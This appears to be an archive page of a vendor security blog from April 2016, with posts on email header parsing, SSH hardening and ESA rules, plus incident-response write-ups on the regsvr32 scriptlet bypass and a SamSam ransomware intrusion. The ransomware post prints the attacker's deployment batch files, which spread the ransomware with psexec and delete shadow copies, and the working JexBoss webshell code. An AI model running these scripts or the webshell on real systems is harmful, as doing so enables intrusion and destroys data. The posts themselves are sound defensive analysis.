All Places > Products > RSA NetWitness Platform > Blog > 2016 > April

I had a request from a customer to parse out some messages from a mail conversation.


Basically the email contains the following headers:


Received-SPF: pass ( is whitelisted); client-ip=; helo=ECAT.waugh.local; envelope-from=david.waugh@waugh.local; x-software=spfmilter 2.001 with libspf2-1.2.10;
Received: from ECAT.waugh.local ([])
  by (8.13.8/8.13.8) with ESMTP id u3RCCOxW024832
  for <>; Wed, 27 Apr 2016 12:12:24 GMT
x-metascan-quarantine-id: e3c4973b-d836-4f37-a47d-62271c21a5cc
Received: from UKXXWAUGHDL1C ([]) by ECAT.waugh.local with ESMTP ; Wed, 27 Apr 2016 13:12:23 +0100
From: "10.5 Test" <>
To: <>
Subject: RE: This is a test through my mail system
Date: Wed, 27 Apr 2016 13:12:23 +0100
Message-ID: <0bd101d1a07e$0e479230$2ad6b690$@waugh.local>
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: Microsoft Outlook 14.0
Thread-Index: AdGget+xlnYyEWhiQrysrAxYJ7qXxgAApK1AAAAdpuAAAAfMIA==
Content-Language: en-gb
X-Virus-Scanned: clamav-milter devel-clamav-0.98-dmgxar-126-gfde6749 at infra1
X-Virus-Status: Clean


The header of interest here is the one called Received-SPF:


I created a parser based on Detecting Sinkholed Domains With The X-Factor Parser


On my Packet Decoder I created a parser called SPF.parser in /etc/netwitness/ng/parsers containing the following:


<?xml version="1.0" encoding="utf-8"?>
<parsers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="parsers.xsd">
    <parser name="SPF Factor" desc="This extracts the SPF string from a Header">
        <declaration>
            <token name="tXfactor" value="Received-SPF:" options="linestart" />
            <number name="vPosition" scope="stream" />
            <string name="vXfactor" scope="stream" />
            <meta name="meta" key="xfactor" format="Text" />
        </declaration>
        <match name="tXfactor">
            <find name="vPosition" value="&#x0d;&#x0a;" length="512">
                <read name="vXfactor" length="$vPosition">
                    <register name="meta" value="$vXfactor"/>
                </read>
            </find>
        </match>
    </parser>
</parsers>

Whenever the Received-SPF header was seen, the rest of the header line was put into the xfactor metakey.
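The parser's logic can be mirrored outside the decoder. Here is a minimal Python sketch of the same idea (match the token at the start of a line, then capture up to the CRLF), purely for illustration:

```python
def extract_spf(raw_email, max_len=512):
    """Return the value of the first Received-SPF header, or None.

    Mirrors the parser: token match at line start, then read up to
    the next CRLF, capped at 512 bytes as in the <find> length.
    """
    token = "Received-SPF:"
    for line in raw_email.split("\r\n"):
        if line.startswith(token):
            return line[len(token):].strip()[:max_len]
    return None
```

A real header parser would also handle folded (multi-line) headers; like this sketch, the decoder parser stops at the first CRLF.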




If your SPF fields are from a different mail provider, then you could adjust the parser accordingly.

For example if your messages had the following header:

Authentication-Results:; spf=pass


Then the line in the parser could be changed from:

<token name="tXfactor" value="Received-SPF:" options="linestart" />

to:

<token name="tXfactor" value="Authentication-Results:; spf=" options="linestart" />


If you wanted to put the result into a different metakey (for example result) then change

<meta name="meta" key="xfactor" format="Text" />

to:

<meta name="meta" key="result" format="Text" />

By RSA Incident Responders Brian Baskin and Andrew Nelson


Endpoint protection is a very difficult task for Windows and endpoint agents alike. Microsoft has deployed many solutions over its various Windows versions to battle the effects of local malicious activity. Attackers continually strive to find new ways of injecting code and malware onto vulnerable systems. New exploits uncovered over time provide many avenues of remote code execution through vulnerabilities in web browsers and document viewers, giving adversaries a small window of attack to place malware onto a targeted system. Discovering such weaknesses, and closing them, has been a continual cat-and-mouse game between vendors, security researchers, and advanced adversaries.


Part of this battle is due to the fact that Windows contains a great deal of seldom-used or legacy functionality. The result is that many possible weaknesses cannot be known until they are discovered in the wild. Because of this, many security professionals have begun to utilize whitelisting programs to protect against malware executing in their environments. As a result, malware authors have often looked for instances of valid Windows programs to use as conduits for their malicious code. That's exactly what occurred recently when security researcher Casey Smith (subTee) reviewed years of data related to the Windows Component Object Model (COM+).


“Its not well documented that regsvr32.exe can accept a url for a script.”

-- Casey Smith


A casual statement that underlines a small crack deep in the heart of Windows. As Smith discovered, Windows can process COM+ Scriptlets (SCT), small XML files that contain various commands. But what was unique to his discovery is that these Scriptlets, processed by regsvr32.exe, can be hosted on Internet-based sites. While registering an object into Windows requires administrative privileges, Smith learned that unregistering an object using a scriptlet can be performed by limited user accounts, even if that object doesn't exist. While not granting any escalated privileges, the method by which this exploit runs can bypass traditional whitelists. All operations occur with standard Windows components and leave behind no trace of their execution. Smith went public and announced his findings under the code name "squiblydoo".
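For reference, a COM+ scriptlet is just a small XML file. A minimal skeleton (illustrative only; the progid, classid, and placeholder payload below are made up, and this is not Smith's actual proof of concept) looks roughly like:

```xml
<?XML version="1.0"?>
<scriptlet>
  <registration
    progid="Hypothetical"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
      <![CDATA[
        // benign placeholder; a real PoC would run a command here
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
      ]]>
    </script>
  </registration>
</scriptlet>
```

The widely published invocation passed such a file's URL to regsvr32.exe with the /u (unregister) and /i: switches against scrobj.dll.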


In keeping up with security threats, RSA's Incident Response team immediately began testing and evaluating the exploit. Using the proof of concept written by Smith, RSA found that Windows XP, 7, and 10 were all vulnerable to the same code, even when run from a limited user account. Analysis performed in a custom sandbox showed no registry artifacts left by the execution. Since Windows treats an HTTP address load as Internet access, it uses standard Internet Explorer libraries to retrieve the file, and creates a connection with a default User-Agent. In modern versions of Windows, this is the User-Agent of Internet Explorer's compatibility view (IE7). This also leaves behind a single IE cached file for the downloaded script that is executed by regsvr32.exe. However, as this execution can also use HTTPS, the SSL connection can prevent the download from being seen by an IDS, with the only artifact being the cached file.


Endpoint security is the critical piece in detecting this attack as it occurs. RSA's ECAT has the unique ability to monitor execution paths on every endpoint, collecting command line arguments and tracking file system artifacts. ECAT also holds a unique strength in the market by empowering security teams with an open and accessible backend, allowing quick queries to be written on the fly to hunt for novel attack methods such as this.


In running the malicious command on an ECAT-monitored endpoint, ECAT's process event tracking immediately recorded the command being executed and its follow-on activity. While this test case was performed directly from cmd.exe, the same artifacts would be observable from other parent processes, such as commonly exploited client software like AcroRd32.exe (Adobe Acrobat) or IExplore.exe (MS Internet Explorer).


Using ECAT’s endpoint tracking feature, attempts to spawn this COM+ attack are readily noticeable.




However, the tell-tale sign of this activity is recorded in the network connections from regsvr32.exe. This application should typically have no access to the Internet and any detection of this behavior should be immediately investigated.




With this in mind, a simple SQL query against the ECAT database, implemented as a custom Instant IOC (IIOC), can give rapid results as to any system exhibiting the behavior, assigning that process an IIOC score of 1024 (blacklist).


Within ECAT simply create a new Instant IOC, shown below, and monitor any alerts that are created:


Instant IOC Query


SELECT
    [na].FK_Machines AS [FK_Machines],
    [na].FK_MachineModulePaths AS [FK_MachineModulePaths]
FROM
    [dbo].[mocNetAddresses] AS [na] WITH(NOLOCK)
INNER JOIN
    [dbo].[MachineModulePaths] AS [mp] WITH(NOLOCK) ON
    ([mp].[PK_MachineModulePaths] = [na].[FK_MachineModulePaths])
INNER JOIN
    [dbo].[FileNames] AS [sfn] WITH(NOLOCK) ON ([sfn].[PK_FileNames] =
    [mp].[FK_FileNames])
WHERE
    [sfn].[FileName] LIKE 'regsvr32.exe'




In addition to its unique endpoint tracking feature, RSA ECAT also has integrated support for YARA rules. This allows for quick blacklisting of known bad files based upon custom written signatures. While attacks using this method leave no trace in the registry, they do leave a single copy of the downloaded script within the Internet Explorer cache. By integrating the following YARA rule, ECAT can detect this script as soon as it is written to the hard drive and immediately alert security teams to its existence:


Malicious SCT Script YARA rule

rule RSA_IR_Windows_COM_bypass_script
{
    meta:
        author="RSA IR"
        Date="22 Apr 2016"
        comment1="Detects potential scripts used by COM+ Whitelist Bypass"
        comment2="More information on bypass located at:"

    strings:
        $s1 = "<scriptlet>" nocase
        $s2 = "<registration" nocase
        $s3 = "classid=" nocase
        $s4 = "[CDATA[" nocase
        $s5 = "</script>" nocase
        $s6 = "</registration>" nocase
        $s7 = "</scriptlet>" nocase

    condition:
        all of ($s*)
}
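Outside ECAT, the same seven markers can be checked with a few lines of Python. This is a rough, case-insensitive stand-in for the YARA rule, not a replacement for it:

```python
# The seven strings from the YARA rule, matched case-insensitively.
MARKERS = [b"<scriptlet>", b"<registration", b"classid=",
           b"[CDATA[", b"</script>", b"</registration>", b"</scriptlet>"]

def looks_like_com_bypass_sct(data):
    """Return True when every marker appears in the file contents."""
    lower = data.lower()
    return all(m.lower() in lower for m in MARKERS)
```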



While this discovery is an issue that will undoubtedly be mitigated by a Windows Update in the future, the vast number of potentially unpatched systems, combined with an open window of easy attack, makes for a period in which this vulnerability could be used successfully. Until this behavior is patched, security teams can only rely upon endpoint agents that can detect its subtle method of execution. As an enterprise level hunting solution, RSA ECAT empowers security teams to detect threats such as Casey Smith's whitelist bypass as well as modern threats used by advanced adversaries to keep organizations secure.

I had a question about how to disable root login on Security Analytics for SSH.


Note before proceeding: make sure that you have iDRAC access set up to your appliances. Although I have tested this script and found it working in my test environment, it does have the potential to lock you out of your appliances. Please take the necessary precautions to prevent this.


You may also wish to explore STIG hardening Configure DISA STIG Hardening - RSA Security Analytics Documentation


The steps to do this are widely available; one example is

How do I disable SSH login for the root user? - Media Temple


This article will demonstrate how we implement these steps in puppet so that they will automatically be propagated through the Security Analytics Deployment.

  1. Changes to SSH Config are made in the file /etc/puppet/modules/ssh/manifests/init.pp on the SA Server.
  2. Make a backup of this file and copy it to a different directory
  3. Replace the existing /etc/puppet/modules/ssh/manifests/init.pp with the one attached. It contains the following content. Make sure that you amend the password for your emergencyroot user.


The changes will then be propagated throughout the deployment on the next Puppet run, so they could take up to 30 minutes to take effect.


class ssh {
  service { 'sshd':
    enable      => true,
    ensure      => running,
  }

  exec { 'fix-ssh':
    #path        => ["/bin", "/usr/bin"],
    command     => "/etc/puppet/scripts/",
  }

  augeas { "sshd_config_X11Forwarding":
    context => "/files/etc/ssh/sshd_config",
    changes => "set X11Forwarding no",
  }

  # Fixes to disable root login and to create an Emergency Root User

  group { 'emergencyroot':
    ensure => 'present',
    gid    => '10018',
  }

  user { 'emergencyroot':
    ensure   => 'present',
    home     => '/home/emergencyroot',
    gid      => '10018',
    password => 'myverysecurepassword',
    uid      => '10018',
    shell    => '/bin/bash',
  }

  augeas { "Disable_Root_Login":
    context => "/files/etc/ssh/sshd_config",
    changes => "set PermitRootLogin no",
    notify  => Service['sshd'],
  }

  augeas { "sudo-emergencyroot":
    context => "/files/etc/sudoers",
    changes => [
      "set spec[user = 'emergencyroot']/user emergencyroot",
      "set spec[user = 'emergencyroot']/host_group/host ALL",
      "set spec[user = 'emergencyroot']/host_group/command ALL",
      "set spec[user = 'emergencyroot']/host_group/command/runas_user ALL",
    ],
    notify  => Service['sshd'],
  }

  file { '/etc/ssh/sshd_config':
    ensure  => present,
    owner   => 'root',
    group   => 'root',
    mode    => '0600',
    #source  => 'puppet:///modules/ssh/sshd_config',
    notify  => Service['sshd'],
  }
}


Years ago, when the ECAT team was all of a handful of Canadians, I saw my first ECAT demo. Look Ma, no feeds, no signatures, no scans. It will still tell you what's wrong, before your highly paid consultant can. At that moment, I was sitting in a demo room, surrounded by exactly such highly paid consultants, eyes wide as onions! Wait, how?!


With STIX still a few years away, OpenIOC seemed poised for greatness at the time.  With roughly 2500 terms to describe conditions on the ground, a standard-based design leveraging XML and LUA parsers, and with thousands of attacks already described in the language, it looked like the best direction moving forward.


The catch, however: where do you start? Some private data showed up on a public server somewhere and now you’re staring at 50,000 endpoints with no clue where the culprit might be hiding. Until that demo, it was still a matter of intuition, discrimination, trial-and-error, as well as hiring the best minds for the job.  They looked for malware, relying on their thousands of ”secret sauce” indicators, a measure of their experience. They took the weekend, scanning. But the first question in anyone’s mind was still: “Am I targeted?” – which roughly (still!) translates into: “Will my intel help me this time?” (Fingers quietly crossed...)


Which is why seeing ECAT in action seemed so implausible. It did not just scan for sophisticated malware and their variants. It actually detected new malware.


Let me let that sink in: Without a feed, without a smart analyst, without any external support, IT FOUND NEW MALWARE.


Again... how?


Besides, it did so with little delay, no enterprise-wide downtime dedicated to scanning, and results in seconds. The demo was only 10 minutes long. When I left that meeting, I started to question the direction the entire industry was taking.


You see, searching for specific malware is not only hard, but also fruitless. It's a Sisyphean task: after all the work done in capturing, describing and sharing your opponent's technique, a simple change can bring you back to square one. Write to this directory, not that. What ECAT did radically differently was look for canonical behaviors. You can spend hours looking for all known variants of Zeus on your endpoint, or you can simply look for generic capabilities shared across all malware, and maybe back it up with some data analytics to decide whether that behavior, in context, is likely to be bad.


ECAT won't name it Zeus, but besides your Zeus, it will also find any other malware that shares behaviors with Zeus. How about all Zeus variants and then some?


Instead of shepherding thousands of IOCs, it had its detection engine built right under its hood. It was not trying to detect things on the endpoint itself. Instead it bagged-and-tagged relevant information and brought it to the server for analysis. Fast, flexible and smart.


When RSA decided to purchase ECAT, I felt a little bit jealous.


Fast forward a few years, and I do find myself with the opportunity to work directly with ECAT, and shape its path forward.


What has changed since then? One big visible difference, certainly, is the Instant IOCs (IIOCs), which at first sight seem to contradict the claim of signature-less prowess. So let's look a bit closer at this feature.


ECAT continues to look for all malware, new and old alike. Its Instant IOCs (IIOCs) describe the behaviors it's looking for, and they enable workflow integration with other modules: things like Alerts, Syslog and so on. But at the core, it's essentially still the same detection engine that took everyone by surprise. We simply let you see the queries.


Managing a library of thousands of known threats is hard. New variants are issued, scanning software changes, bugs are found (but fixes are rarely propagated). The authors move on to greener pastures ("how did this old indicator work?"). The fact is, while many superheroes find new and exciting malware and might even jot down the indicator to look for it elsewhere, as an industry we find ourselves with a great dearth of doctors to maintain that treasure trove of thousands of entries in threat intelligence. In essence, that is the "Indicator Challenge".


With ECAT, the list is small, and it comes right out of the box. Nothing to refresh, and for a product with a few years under its belt, that set of canonical searches has withstood the test of time with remarkable aplomb. Even as new malware is created, the mechanisms of attack are curiously constant! IIOC maintenance is part of every ECAT release.


And therein lies the magic!


Next installments: When to create new IIOCs and a side-by-side dissection showing OpenIOC / STIX and IIOC triggering on the same malware. Known malware, to give them a chance!

I had a look in my test system today and noticed that my ESA Trial Rules had been disabled.


esa Trial Rules Disabled.png


Further investigation in Health and Wellness showed that a particular rule was using much more memory than any of the others. As this is a test VM, the virtual memory available is much less than on a physical appliance. Here we can see that this rule is using 311 MB!


Bad ESA Rule.png


This was not what I intended for this rule, so looking at the EPL for the rule reveals the following:


module UserAgent_Alert;


@Hint('reclaim_group_aged=60 minutes,reclaim_group_freq=1')

// The stage setters - the output of these statements is for Esper to retain (internally)

CREATE WINDOW UserAgentWatchList.win:time(60 minutes) (client string);

INSERT INTO UserAgentWatchList SELECT client from Event(client IS NOT NULL AND alert_id IS NOT "Client Ignore");

// The real “alerter”. The annotation identifies it as the one that ESA needs to watch for.



@Name('UserAgent Watchlist')

@Description('This alert will trigger on new User Agents but only 1 alert per individual IP address.')

SELECT * FROM Event(client is NOT NULL AND alert_id IS NOT "Client Ignore" ) WHERE client NOT in (SELECT client FROM UserAgentWatchList) ;


Here the issue is that I put all clients into the UserAgentWatchList, not just new ones. This meant that duplicate values were stored in this named window.
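The memory effect of the two approaches can be sketched in Python, with a plain list standing in for the Esper named window (illustrative only; Esper manages retention and reclaim itself):

```python
def insert_all(window, clients):
    # The original rule: every matching event is inserted,
    # so repeat clients pile up in the named window.
    for c in clients:
        window.append(c)

def insert_if_new(window, clients):
    # The corrected rule ("merge ... when not matched then insert")
    # only stores a client the first time it is seen.
    for c in clients:
        if c not in window:
            window.append(c)

events = ["Mozilla/5.0", "curl/7.40", "Mozilla/5.0"] * 1000
w1, w2 = [], []
insert_all(w1, events)
insert_if_new(w2, events)
# w1 holds 3000 rows; w2 holds only the 2 distinct clients
```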


The correct rule is the following. In this example I only add a client to the named window UserAgentWatchListLowMem if it is not already in the named window.


@Hint('reclaim_group_aged=60 minutes,reclaim_group_freq=1')

// The stage setters - the output of these statements is for Esper to retain (internally)

CREATE WINDOW UserAgentWatchListLowMem.win:time(60 minutes) (client string);

On Event(client IS NOT NULL AND alert_id IS NOT "Client Ignore") as myevent

merge UserAgentWatchListLowMem WatchListClient

where WatchListClient.client=myevent.client

when not matched

then insert select client;


// The real “alerter”. The annotation identifies it as the one that ESA needs to watch for.



@Name('UserAgent WatchlistLowMem')

@Description('This alert will trigger on new User Agents but only 1 alert per individual IP address.')

SELECT * FROM Event(client is NOT NULL AND alert_id IS NOT "Client Ignore" ) WHERE client NOT in (SELECT client FROM UserAgentWatchListLowMem) ;


You can check memory utilisation of your Named Windows using this article.

How do I look in the Named Windows of my ESA Rules


  Chris Ahearn

  Mark Stacey



There has been a lot of attention around ransomware attacks in the past few weeks and months.  Prior to the current outbreak, ransomware attacks were largely the result of phishing emails or unfortunate web browser redirection that would impact a single or small number of systems at a time.  Last fall we witnessed a shift in tactics and over the past few months we’ve observed a surge in large scale ransomware attacks.  The RSA Incident Response team has responded to several of these incidents at client sites.   In this post, we will discuss one of those incidents in-depth.



The client initially stated that they believed this was a mass malware infection affecting a majority of the systems on their network. This was something analysts had not observed in a long time. Students of history will recall that mass malware infections were once a hot topic, with worms such as Blaster, Conficker, ILOVEYOU, and many others. When the information came in about a mass infection of ransomware, our team was skeptical but interested in investigating the incident.


As part of our initial call, the client provided a sample that they believed was responsible for the outbreak.


File Name       : samsam.exe

File Size       : 218,624 bytes

MD5             : a14ea969014b1145382ffcd508d10156

SHA1            : ff6aa732320d21697024994944cf66f7c553c9cd

Fuzzy           : 3072:ZVdp01i6vcHV1LI5FLV0pZeZKfOJizjrBnNtRg+ur199J+n9fCbP:Za1i6UHVyLV0poZa1jrD099on9

Import Hash     : f34d5f2d4577ed6d9ceec516c1f5a744

Compiled Time   : Wed Jan 06 00:14:43 2016 UTC

VirusTotal      : 10/50 (1/14/2016)

PE Sections (3) : Name       Size       MD5

                  .text      216,064    7a556f246357051b2d82ea445571ddbb

                  .rsrc      1,536      d0b581056989efaa1de31a61a8f4a9ec

                  .reloc     512        06441ad348b483e2458a535949e809cf


The sample, which is commonly referred to as SamSam, was a C# .NET binary. Compiled into the SamSam binary were two additional files, del.exe and selfdel.exe. The file del.exe is a signed copy of the legitimate Microsoft Sysinternals SDelete (version 1.61). The file selfdel.exe is responsible for deleting samsam.exe using del.exe.


File Name       : del.exe

File Size       : 155,736 bytes

MD5             : e189b5ce11618bb7880e9b09d53a588f

SHA1            : 964f7144780aff59d48da184daa56b1704a86968

Import Hash     : d7caa1d72871c092dd85c4a3c5aa93bf

Compiled Time   : Sat Jan 14 23:06:53 2012 UTC

PE Sections (4) : Name       Size       MD5

  .text      116,736    a2f62fcb0a5724091981ffd869f858b4

  .rdata     25,600     b4404e299743806866081071f9194ab6

  .data      4,096      9b5b9643241417a53ebb221a1dda65f9

  .rsrc      1,536      601b278c419aa6bd7794cc85ced85721





File Name : selfdel.exe

File Size : 5,632 bytes

MD5 : 710a45e007502b8f42a27ee05dcd2fba

SHA1 : 5e70502689f6bf87eb367354268923e6a7e875c6

Import Hash : f34d5f2d4577ed6d9ceec516c1f5a744

Compiled Time : Wed Dec 02 22:24:42 2015 UTC

PE Sections (3) : Name       Size       MD5

  .text      3,072      90d77179cca96fa39f5d76f6994dc6a2

  .rsrc      1,536      e92524d72197e7683a442abe4f4581bc

  .reloc     512        caa5e20676622236360e8a65188380a6



Our analysis of the SamSam binary quickly revealed that the sample would detect local and mapped drives, enumerating the files present on the file system and targeting over 300 different file extensions (while excluding some specific directories) that would ultimately be encrypted. The encrypted files had an extension of *.encryptedRSA. This SamSam binary also expected, as a runtime argument, the path to a public encryption key which would be used in the attack against the system. The image below shows part of the code of SamSam looking for the public key.


The fact that this SamSam binary required arguments indicated to RSA analysts that this file was either dropped and executed by another binary or script, potentially involving human interaction. The analysis of the SamSam binary further documented the process by which files were encrypted and deleted, which is described below. Once RSA analysts arrived on the client site, we quickly triaged several systems that had been compromised. Analysts discovered that the SamSam binary was deployed throughout the network with the use of psexec and compromised domain administrator credentials. Event logs indicated that the source of the malicious activity was one of the organization's web servers. Further investigation of this web server revealed that the adversary had exploited an older vulnerability in the JBoss web application. Using Log2Timeline, RSA analysts built system timelines from multiple systems, ultimately leading to the discovery of additional artifacts.


The image above depicts entries showing how the attacker had uploaded a zip file (, which contained their tools, to the vulnerable webserver.




The contents of the are displayed in the image above. The list.txt file contained a list of computer names on the victim's network, which would be used in conjunction with the other scripts to target systems. This indicates that the attacker had performed prior reconnaissance inside the network. The contained all the public encryption keys the attacker was going to use, one per system. Ps.exe was a copy of the legitimate SysInternals tool psexec. The file f.bat was responsible for copying SamSam (samsam.exe) and the corresponding system encryption key to each target. The file f.bat would also delete any volume shadow copies, hindering recovery or backup efforts. The image below depicts the contents of f.bat.


@echo off

for /f "delims=" %%a in (list.txt) do copy samsam.exe \\%%a\C$\windows\system32 && copy %%a_PublicKey.xml \\%%a\C$\windows\system32 && vssadmin delete shadows /all /quiet




The file reg.bat, shown below, was then responsible for executing SamSam, using Psexec, with the path to the public key as an argument.



@echo off

for /f "delims=" %%a in (list.txt) do ps -s \\%%a cmd.exe /c start /b C:\windows\system32\samsam.exe %%a_PublicKey.xml




A search for any artifacts related to the above files was conducted, and a hit for list.txt was located on the previously referenced JBOSS web application server. Some quick analysis indicated that this was an older version of JBOSS (JBoss 5.0.1.GA was released in February 2009).



01/11/2016,18:12:28,EST5EDT,MACB,EVTX,Security,Event Logged,-,,Event ID Security/Microsoft-Windows-Security-Auditing:4634,Security/Microsoft-Windows-Security-Auditin

g ID [4634] :EventData/Data -> TargetUserSid = S-1-5-21-1844237615-1757981266-725345543-20282 TargetUserName = ABCDC2K8$ TargetDomainName = ambuscon TargetLogonId = 0x000000033336a41a L

ogonType = 3 ,2,Security.evtx,46657,Description of EventIDs can be found here:;EN-US;947226 URL:


01/11/2016,18:12:46,EST5EDT,M.C.,FILE,NTFS $MFT,$SI [M.C.] time,-,-,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/list.txt,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/list.txt,2,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/list.txt,446341, ,Log2t::input::mft,-

01/11/2016,18:12:55,EST5EDT,.A.B,FILE,NTFS $MFT,$SI [.A.B] time,-,-,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/ok.txt,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/ok.txt,2,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/ok.txt,445865, ,Log2t::input::mft,-



Further analysis of the JBOSS server directory where list.txt was discovered revealed numerous other artifacts, including a webshell, batch files, and reGeorg (, a tool used for TCP tunneling through a SOCKS proxy. The dates and times associated with these files, displayed below, confirmed what we had suspected: this incident began earlier than the client initially thought.




Some of the newly discovered dates of interest go back at least a month prior to the start of this incident.  The file 'css.jsp' appears to be a variant of a JSP File Manager providing the attacker with the ability to upload and download various files or tools as well as issue commands.


An example of what the css.jsp would have looked like to the attacker is displayed below. The inset box shows the password that was required to access it. Once authenticated, the attacker would be presented with the file manager interface, depicted in the next image.


The legal disclaimer for tunnel.jsp (reGeorg), is displayed below.  This tool is designed to proxy or tunnel traffic over existing and allowed ports or protocols.



One other tool uploaded by the attacker (and listed above) was the Microsoft tool csvde.exe, a legitimate utility used to extract Active Directory LDAP information and save it to a CSV file. Using this tool, the attacker pulled back all the possible systems in the domain and saved them as 'com.csv'. Once the reGeorg (tunnel.jsp) SOCKS tunnel was in place and allowing remote connectivity, the attacker then utilized RDP connections into the customer environment. A few weeks later, on the day of the encryption portion of the attack, the attacker uploaded some scripts to determine which systems (from list.txt) were currently online. The online systems' names were then output to a file, which was then used to deploy SamSam (and related files) to the targeted systems.

Seeing the loopback IP address ( in an event log detailing RDP sessions, which is typically not allowed on Windows systems, can be an indicator of a tool like the reGeorg SOCKS proxy. The following log decoder app rule can be used with SA for Logs to detect such activity:


"device.type='winevent_nic','winevent_snare' && logon.type='10' && ip.src exists && ip.src="


There was also additional evidence of JBOSS exploitation using JexBoss, a JBOSS verify and exploitation tool. While investigating the invokermngrt.war directory, RSA analysts also noticed a jbossass.war directory.




The jbossass.war contained one file, called jbossass.jsp. This file was another webshell, dropped as a result of the JexBoss exploitation.



<%@ page import="java.util.*,*"%><pre><% if (request.getParameter("ppp") != null && request.getHeader("user-agent").equals("jexboss")) { Process p = Runtime.getRuntime().exec(request.getParameter("ppp")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } }%>


This webshell would provide a shell into the compromised web server.  Traffic in Security Analytics may look something like this:




Using the Security Analytics IR Content Pack, analysts could find this type of activity by investigating:

• direction = ‘inbound’

• action = ‘post’

• ir.general = ‘http_post_no_get’

• ir.general = ‘six_or_less_headers’

• ir.general = ‘post_no_get_no_referer’

• ir.general = ‘http_no_ua’



If you are running JBOSS, it is recommended that you monitor those systems closely in light of the recent wave of attacks. Queries such as "directory = '/invoker/' && filename = 'jmxinvokerservlet'" can also help focus the analysis.







The client’s original remediation plan was to restore backups (from a couple of days before the attack began) of the affected systems.  This would have left the organization vulnerable to this attacker and others, potentially resulting in this same scenario occurring again at a later date.  By properly scoping and investigating the incident, it was determined that the attacker had gone undetected for over a month.  The attacker had initially targeted vulnerable applications (JBOSS) and then established a beachhead to perform some reconnaissance and upload tools.  This allowed the attacker to harvest privileged credentials.  With compromised domain administrator credentials, the attacker was able to map out the network, and then come back at a later date to complete the attack.


RSA continued researching the malware utilized in this attack, and determined that this client was not the only target in this campaign.  This research uncovered 7 additional “C2” sites and bitcoin addresses, both used to facilitate paying the ransom.   Analysis of bitcoin address transactions indicated that there were several other potential victims.  After monitoring the bitcoin transactions for several weeks, there appeared to be approximately $350,000 in bitcoins in an account (numerous transactions from different accounts were followed), before the trail went cold. This illustrates how profitable this type of attack can be for attackers and how costly it can be for organizations.


There were several lessons learned from this engagement.

  • Identify where domain admin credentials are used, how many accounts have access, and what they are logged into.  These accounts wind up being the crown jewels to an adversary.
  • Keep web application servers, as well as any externally facing applications, up to date.  While this attack, as well as some recent variants, targeted JBOSS, other applications could also fall victim given enough time and effort spent on exploitation.
  • Maintain external and offline backups.
  • Actively monitor the network and its users.  Security Analytics and ECAT can certainly help in those respects.

On April 12, Microsoft issued a vulnerability update to inform its customers that a vulnerability had been found in its software which would allow a man-in-the-middle attack on software that leverages the SAM and LSAD implementations on most Microsoft Windows operating systems. This issue has important consequences, and it currently (at the time of this writing) tops security concerns in the Windows operating system groups. It even has its own collection of logos in the Twitterverse! So our team of engineers investigated.


Summary (from the NIST National Vulnerability Database):


The SAM and LSAD protocol implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 do not properly establish an RPC channel, which allows man-in-the-middle attackers to perform protocol-downgrade attacks and impersonate users by modifying the client-server data stream, aka "Windows SAM and LSAD Downgrade Vulnerability", or "BADLOCK".


RSA ECAT Engineering has researched the issue and reports that none of the RSA ECAT versions supported are affected by this vulnerability.



Microsoft has issued a patch to address this vulnerability, as documented in the Microsoft Security Bulletin MS16-047.



This issue does not affect RSA ECAT. As usual, we recommend that all underlying infrastructure be kept fully patched.



Microsoft Announcement: Security Update for SAM and LSAD Remote Protocols (3148527)

NIST CVE: Vulnerability Summary for CVE-2016-0128 (Microsoft products)

Samba report: SAMR and LSA man in the middle attacks possible (CVE-2016-2118)

NIST CVE: Vulnerability Summary for CVE-2016-2118 (Samba products)



Security Analytics 10.6 has a new feature that will allow you to significantly reduce your storage footprint for long-term log retention on the Archiver.  Selective Log Retention allows you to create 'buckets' for your logs and specify differing retention periods for those buckets.  For example, you could create a bucket, or collection, for your compliance logs to keep for years, a bucket for your security-relevant logs to keep for six months, and a bucket for copious, low-value logs to keep for weeks.


Previously, if you needed to keep compliance logs for years, you had to keep all logs for years, whether you needed them or not.  Aging out less valuable logs on shorter time frames frees up space for your important logs, allowing you to significantly extend the retention period for those logs without adding storage.  You still have the options for Hot, Warm, and Cold storage with individually configurable settings per collection.




The easiest way to set up Selective Log Retention is to configure rules to separate out your compliance regulation logs, such as with Event Source Groups or Device IP (device.ip), and set the appropriate required retention period.  Next, find the bulk of the low-value logs by either Event Source Type (device.type) or Message ID and give those the lowest acceptable retention period.  Lastly, configure the retention period on the default collection, which will contain all of the remaining logs.  Further configuration refinement can optimize storage even more.
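As a sketch, the rule conditions for those collections might look like the following (the meta values are hypothetical placeholders, not recommendations):

```
Compliance collection (multi-year retention):   device.ip = 10.1.1.5,10.1.1.6
Low-value collection (short retention):         device.type = 'ciscoasa'
Default collection (remaining logs):            everything not matched above
```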


Let us know what you think and how it works for you!


More information can be found on RSA Security Analytics Documentation under Security Analytics 10.6 > Data Privacy Management > References > Data Retention Tab - Archiver or Security Analytics 10.6 > Host and Services Configuration Guides > Archiver Configuration Guide > Configure Archiver > Step 3. Configure Archiver Storage and Log Retention > Configure Log Storage Collections.

Security Analytics 10.6 has a new beta feature that allows SA to monitor your event source collection and alarm or notify you when an event source falls below or exceeds the rate that is normal for that event source.  The goal is to take away the need to manually determine which event sources have similar rates, group those event sources, and create monitoring policies to match, significantly reducing the burden on system administrators.  It is enabled by default to alarm but not to send notifications.


It takes about 5 days to build the baseline, and SA will then start generating alarms whenever a device deviates from that baseline.  In the case shown in the screenshot below, this Cisco router normally generates 333 events between 6:00 PM and 7:00 PM, but we haven't received any events, which is 2.657 standard deviations below normal.  The alarm shows up on the Administration -> Event Sources -> Alarms page.
